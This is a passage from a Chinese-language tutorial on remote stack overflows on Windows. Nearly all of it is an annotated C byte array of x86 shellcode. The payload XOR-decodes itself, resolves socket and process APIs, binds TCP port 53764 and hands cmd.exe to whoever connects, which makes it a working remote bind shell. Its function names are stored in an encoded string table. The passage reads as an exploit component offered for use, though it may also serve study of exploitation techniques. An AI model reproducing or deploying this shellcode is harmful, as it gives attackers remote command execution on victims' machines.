window系统下的远程堆栈溢出----shellcode编写
应用前面的设计思想,我们可以写出来shellcode如下:
unsigned char sploit[580] = {
0x90, 0x8b, 0xfc,/* mov edi,esp
0x33, 0xc0,/* xor eax, eax
0x50,/* push eax*/
0xf7, 0xd0,/* not eax */
0x50,/* push eax*/
0x59,/* pop ecx */
0xf2,/* repnz */
0xaf,/* scasd */
0x59,/* pop ecx */
0xb1, 0xc6,/* mov cl, C6*/
0x8b, 0xc7,/* mov eax, edi*/
/*Xorshellcode *//* */
0x48,/* dec eax */
0x80, 0x30, 0x99,/* xor byte ptr [eax], 99*/
0xe2, 0xfa,/* loop Xorshellcode */
0x33, 0xf6,/* xor esi, esi
0x96,/* xchg eax,esi*/
0xbb,0x99, 0xe8, 0x61, 0x42, /* mov ebx, &LoadLibrary */
0xc1, 0xeb, 0x08,/* shr ebx, 08 */
0x56,/* push esi*/
0xff, 0x13,/* call dword ptr [ebx]*/
0x8b, 0xd0,/* mov edx, eax
0xfc,/* cld */
0x33, 0xc9,/* xor ecx, ecx*/
0xb1, 0x0b,/* mov cl, 0B*/
0x49,/* dec ecx */
/* loadKernelProcess *//* */
0x32, 0xc0,/* xor al, al*/
0xac,/* lodsb */
0x84, 0xc0,/* test al, al */
0x75, 0xf9,/* jne loadKernelProcess */
0x52,/* push edx
0x51,/* push ecx*/
0x56,/* push esi*/
0x52,/* push edx*/
0xb3, 0xe4,/* mov bl, e4&GetProcAddr*/
0xff, 0x13,/* call dword ptr [ebx]*/
0xab,/* stosd */
0x59,/* pop ecx */
0x5a,/* pop edx */
0xe2, 0xec,/* loop loadKernelProcess*/
/* */
0x32, 0xc0,/* xor al, al*/
0xac,/* lodsb */
0x84, 0xc0,/* test al, al */
0x75, 0xf9,/* jne 00000176*/
0xb3, 0xe8,/* mov bl, e8*/
0x56,/* push esi*/
0xff, 0x13,/* call dword ptr [ebx]*/
0x8b, 0xd0,/* mov edx, eax*/
0xfc,/* cld */
0x33, 0xc9,/* xor ecx, ecx*/
0xb1, 0x06,/* mov cl, 06*/
/* loadSocketProcess */
0x32, 0xc0,/* xor al, al*/
0xac,/* lodsb */
0x84, 0xc0,/* test al, al */
0x75, 0xf9,/* jne loadSocketProcess */
0x52,/* push edx*/
0x51,/* push ecx*/
0x56,/* push esi*/
0x52,/* push edx*/
0xb3, 0xe4,/* mov bl, e4*/
0xff, 0x13,/* call dword ptr [ebx]*/
0xab,/* stosd */
0x59,/* pop ecx */
0x5a,/* pop edx */
0xe2, 0xec,/* loop loadSocketProcess*/
/*
这一段代码就是前期的准备工作,它负责获得所有的函数的入口地址,这些函数是是?
"KERNEL32.dll"
"CreatePipe"
"GetStartupInfoA"
"CreateProcessA"
"PeekNamedPipe"
"GlobalAlloc"
"WriteFile"
"ReadFile"
"Sleep"
"ExitProcess"
"WSOCK32.dll"
"socket"
"bind"
"listen"
"accept"
"send"
"recv"
*/
0x83, 0xc6, 0x05,/*add esi, 00000005;跳过recv\0,esi指向socksstruc,此时edi=esp+4+sexploit+函数table(16*4) */
0x33, 0xc0,/* xor eax, eax
0x50,/* push eax ;protocol=0
0x40,/* inc eax
0x50,/* push eax;SOCK_STREAM=1
0x40,/* inc eax
0x50,/* push eax;AF_INET=2
0xff, 0x57, 0xe8,/* call [edi-18] ;call socket(2,1,0);
0x93,/* xchg eax,ebx;ebx now contain SOCKET . */
0x6a, 0x10,/* push 00000010 ;length of sockstruc
0x56,/* push esi;address of sockstruc
0x53,/* push ebx;SOCKET
0xff, 0x57, 0xec,/* call [edi-14] ;bind
0x6a, 0x02,/* push 00000002 ;2个连接
0x53,/* push ebx;SOCKET
0xff, 0x57, 0xf0,/* call [edi-10] ;call listen
0x33, 0xc0,/* xor eax, eax
0x57,/* push edi
0x50,/* push eax
0xb0, 0x0c,/* mov al, 0C
0xab,/* stosd
0x58,/* pop eax
0xab,/* stosd
0x40,/* inc eax
0xab,/* stosd ;=true;create SEECURITY_ATTRIBUTES at edi*/
0x5f,/* pop edi
0x48,/* dec eax
0x50,/* push eax;0
0x57,/* push edi;SECURITY_ATTRIBUTES
0x56,/* push esi;to ret write pipe,这个eesi刚才指向sockstruc,现在没有用了,正好放hand*/
0xad,/* lodsd ;esi+4,esi->eax
0x56,/* push esi;to ret read pipe
0xff, 0x57, 0xc0,/* call [edi-40] ;CreatePipe
0x48,/* dec eax
0x50,/* push eax
0x57,/* push edi
0xad,/* lodsd
0x56,/* push esi
0xad,/* lodsd
0x56,/* push esi
0xff, 0x57, 0xc0,/* call [edi-40] ;CreatePipe agaiin */
0x48,/* dec eax
0xb0, 0x44,/* mov al, 44
0x89, 0x07,/* mov dword ptr [edi], eax
0x57,/* push edi
0xff, 0x57, 0xc4,/* call [edi-3C] ;GetStartupInfo, saved aat edi */
0x33, 0xc0,/* xor eax, eax
0x8b, 0x46, 0xf4,/* mov eax, dword ptr [esi-0C]
0x89, 0x47, 0x3c,/* mov dword ptr [edi+3C], eax ;hStdOutput=firsstWrite*/
0x89, 0x47, 0x40,/* mov dword ptr [edi+40], eax ;StdError= firsttWrite */
0x8b, 0x06,/* mov eax, dword ptr [esi]
0x89, 0x47, 0x38,/* mov dword ptr [edi+38], eax ;StdInput=seconddRead*/
0x33, 0xc0,/* xor eax, eax
0x66, 0xb8, 0x01, 0x01,/* mov ax, 0101;
0x89, 0x47, 0x2c,/* mov dword ptr [edi+2C], eax ;dwFlags = STARTTF_USESHOWWINDOW+STARTF_USESTDHANDLES*/
0x57,/* push edi;StartupInfo
0x57,/* push edi;StartupInfo
0x33, 0xc0,/* xor eax, eax
0x50,/* push eax;lpCurrentDirecttory = NULL*/
0x50,/* push eax;lpEnvironment == NULL;*/
0x50,/* push eax;dwCreationFlagss = 0; */
0x40,/* inc eax
0x50,/* push eax;bInheritHandless = true;*/
0x48,/* dec eax
0x50,/* push eax;lpThreadAttribuutes=0;*/
0x50,/* push eax;lpProcessAttribbutes=0; */
0xad,/* lodsd ;
0x56,/* push esi;lpCommandLine=eesi="cmd.exe"*/
0x33, 0xc0,/* xor eax, eax
0x50,/* push eax;lpApplicationNaame=NULL;*/
0xff, 0x57, 0xc8,/* call [edi-38] ;CreateProcessA,,eax=1:ok,0:error. */
0xff, 0x76, 0xf0,/* push [esi-10]
0xff, 0x57, 0xcc,/* call [edi-34]
0xff, 0x76, 0xfc,/* push [esi-04]
0xff, 0x57, 0xcc,/* call [edi-34]
0x48,/* dec eax
0x50,/* push eax;0
0x50,/* push eax;SOCKET
0x53,/* push ebx;accept
0xff, 0x57, 0xf4,/* call [edi-0C] ;ebx contains thhe client SOCKET */
0x8b, 0xd8,/* mov ebx, eax
0x33, 0xc0,/* xor eax, eax
0xb4, 0x04,/* mov ah, 04
0x50,/* push eax;1024
0xc1, 0xe8, 0x04,/* shr eax, 04
0x50,/* push eax;64:GMEM_FIXED+GGMEM_ZEROINIT*/
0xff, 0x57, 0xd4,/* call [edi-2C] ;GlobalAAlloc 1024 */
0x8b, 0xf0,/* mov esi, eax;esi contains thhe buffer*/
/* PeekPipe: */
0x33, 0xc0,/* xor eax, eax
0x8b, 0xc8,/* mov ecx, eax
0xb5, 0x04,/* mov ch, 04
0x50,/* push eax;lpBytesLefttThisMessage =0*/
0x50,/* push eax;lpTotalByteesAvail=0*/
0x57,/* push edi;lpBytesReadd*/
0x51,/* push ecx;nBufferSizee=1024 */
0x56,/* push esi;lpBBuffer */
0xff, 0x77, 0xa8,/* push [edi-58];handle of read pipe */
0xff, 0x57, 0xd0,/* call [edi-30];PeekNamedPPipe */
0x83, 0x3f, 0x01,/* cmp dword ptr [edi], 00000001 ;[edi] contaains bytes to read */
0x7c, 0x22,/* jl GetUserInput ;
0x33, 0xc0,/* xor eax, eax
0x50,/* push eax ;lpOverlappped = NULL */
0x57,/* push edi ;lpNumberOffBytesRead */
0xff, 0x37,/* push dword ptr [edi] ;nNumberOfBBytesToRead*/
0x56,/* push esi ;lpBuffer*/
0xff, 0x77, 0xa8,/* push [edi-58];handle of file to read*/
0xff, 0x57, 0xdc,/* call [edi-24];ReadFile*/
0x0b, 0xc0,/* or eax, eax
0x74, 0x2f,/* je GameOver
0x33, 0xc0,/* xor eax, eax
0x50,/* push eax;flag=0
0xff, 0x37,/* push dword ptr [edi];len
0x56,/* push esi;buf
0x53,/* push ebx;SOCKET
0xff, 0x57, 0xf8,/* call [edi-08] ;send()
0x6a, 0x50,/* push 00000050
0xff, 0x57, 0xe0,/* call [edi-20]
0xeb, 0xc8,/* jmp PeekPipe
/* GetUserInput: */
0x33, 0xc0,/* xor eax, eax
0x50,/* push eax
0xb4, 0x04,/* mov ah, 04;1024
0x50,/* push eax;buf
0x56,/* push esi;SOCKET=2cc*/
0x53,/* push ebx;recv
0xff, 0x57, 0xfc,/* call [edi-04]
0x57,/* push edi;lpOverlappped */
0x33, 0xc9,/* xor ecx, ecx
0x51,/* push ecx;pointer tto number of bytes written */
0x50,/* push eax;nNumberOffBytesToWrite*/
0x56,/* push esi;buf
0xff, 0x77, 0xac,/* push [edi-54] ;writehanddle*/
0xff, 0x57, 0xd8,/* call [edi-28] ;WriteFilee(user-->StdInput) */
0x6a, 0x50,/* push 00000050
0xff, 0x57, 0xe0,/* call [edi-20]
/* GameOver: */
0xeb, 0xaa,/* jmp PeekPipe
0x50,/* push eax
0xff, 0x57, 0xe4,/* call [edi-1C] ;ExitProceess*/
0x90,/* nop
/*
这里的长长代码就是那段C语言的算法,我的注释很详细,就不多说了
*/
0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99,
0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde,
0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6,
0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1,
0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8,
0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb,
0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed,
0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0,
0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0,
0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xd6,
0xda, 0xd2, 0xaa, 0xab, 0x99, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,
0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,
0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99,
0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99,
0x4b, 0x9d, // word value for bind port, 4b9d xor 9999h=53764
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xff, 0xff, 0xff,
0x0d, 0x0a};
/*
这些就是那个字符串表,已经经过了编码。
*/
|
